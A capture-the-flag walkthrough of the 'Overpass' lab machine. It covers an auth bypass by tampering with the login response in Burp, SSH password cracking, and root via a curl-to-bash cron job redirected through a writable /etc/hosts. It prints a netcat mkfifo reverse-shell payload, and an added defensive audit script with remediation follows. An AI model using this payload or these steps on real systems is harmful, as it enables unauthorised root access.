Overpass
Port Scan
Directory Scan
Web Exploitation
After seeing all the directories, /admin was the most interesting to me. Looking at the source code, I found some interesting .js files:
login.js
This piece of code has a vulnerability: it checks the response in the browser, and if it isn't "incorrect credentials", it redirects us to the /admin page.
Get admin privilege
Intercept the login request with Burp Suite and change the response to get the admin panel.
Right-click on the request and choose Do intercept > Response to this request.
This is the response we get
Updated response
Admin homepage
User Shell
We got the username from the admin panel; I've used John to crack the SSH password.
We successfully got a shell.
Root shell
I've used a Python server to get linpeas onto the machine.
We have permission to write to /etc/hosts.
There's a cron job running as root which basically uses curl and pipes the output into bash.
We are going to change the content of /etc/hosts, adding our IP as overpass.thm.
First, create the files on your local machine.
Add a payload in buildscript.sh.
Add your IP and port:
[ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]
Start a python3 server.
Start a netcat listener.
Wait around 1 minute to get a root shell.
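The root step above works because a root cron job pipes a download into bash while /etc/hosts is writable by unprivileged users. As an added example (not part of the original writeup), this shell sketch audits copies of a crontab and a hosts file for that combination; the function names, the sample cron lines, the path before buildscript.sh and mirror.example are constructed.

```shell
# Flag cron jobs that pipe a download into a shell; raise severity when the
# hosts file that resolves the download host is writable by non-owners.

# Hostname part of a URL; the scheme is optional, as in "curl host/path".
url_host() {
    u=${1#*://}; u=${u%%/*}
    printf '%s\n' "${u%%:*}"
}

# Print "<user> <host>" for each /etc/crontab-style line that pipes curl or
# wget into sh/bash. Assumes the URL is the first non-option word.
piped_downloads() {
    grep -Ev '^[[:space:]]*#' "$1" |
    grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' |
    while read -r _m _h _dom _mon _dow user cmd; do
        set -f; seen=0            # no globbing while splitting the command
        for w in $cmd; do
            if [ "$seen" = 1 ] && [ "${w#-}" = "$w" ]; then
                printf '%s %s\n' "$user" "$(url_host "$w")"; break
            fi
            case $w in curl|wget|*/curl|*/wget) seen=1 ;; esac
        done
    done
}

# True if the file is writable by its group or by everyone.
loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

# audit <crontab> <hosts>: one line per finding, HIGH when a root job's
# download host can be re-pointed through a loosely writable hosts file.
audit() {
    piped_downloads "$1" | while read -r user host; do
        sev=WARN
        if [ "$user" = root ] && loosely_writable "$2"; then sev=HIGH; fi
        printf '%s %s %s\n' "$sev" "$user" "$host"
    done
}

# Constructed sample input; run against copies, not the live files.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '# m h dom mon dow user command' \
        '* * * * * root curl overpass.thm/path/to/buildscript.sh | bash' \
        '0 3 * * * backup /usr/bin/wget -q https://mirror.example/job.sh -O- | sh' > "$d/crontab"
    printf '127.0.0.1 localhost\n' > "$d/hosts"; chmod 666 "$d/hosts"
    audit "$d/crontab" "$d/hosts"; rm -rf "$d"
}
demo
```

A HIGH finding is fixed by restoring /etc/hosts to root-only write access and by having the job run a locally stored, root-owned script instead of piping a download into a shell.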